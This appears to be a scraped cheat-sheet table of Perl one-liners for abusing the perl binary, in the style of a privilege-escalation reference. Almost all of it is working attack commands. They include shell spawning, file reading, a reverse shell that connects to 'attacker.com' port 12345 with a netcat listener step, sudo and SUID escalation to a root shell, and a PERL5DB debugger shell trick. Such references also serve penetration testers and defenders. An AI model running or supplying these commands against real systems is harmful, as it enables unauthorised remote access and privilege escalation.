| code | 
 
| perl -e 'exec "/bin/sh";' | 
 
 
 | 
 
 
 | 
| code | 
 
| LFILE=file_to_read
perl -ne print $LFILE
 | 
 
 
 | 
 
 
 | 
| description | 
code | 
 
| Run `nc -l -p 12345` on the attacker box to receive the shell. | 
export RHOST=attacker.com
export RPORT=12345
perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
 | 
 
 
 | 
 
 
 | 
| code | 
 
| ./perl -e 'exec "/bin/sh";' | 
 
 
 | 
 
 
 | 
| code | 
 
| sudo perl -e 'exec "/bin/sh";' | 
 
 
 | 
 
| description | 
code | 
 
| Don't forget to `CTRL+D` to exit the perl shell and get the shell. | 
sudo PERL5OPT=-d PERL5DB='exec "/bin/sh"' perl | 
 
 
 | 
 
 
 | 
| code | 
 
| ./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";' | 
 
 
 | 
 
 
 |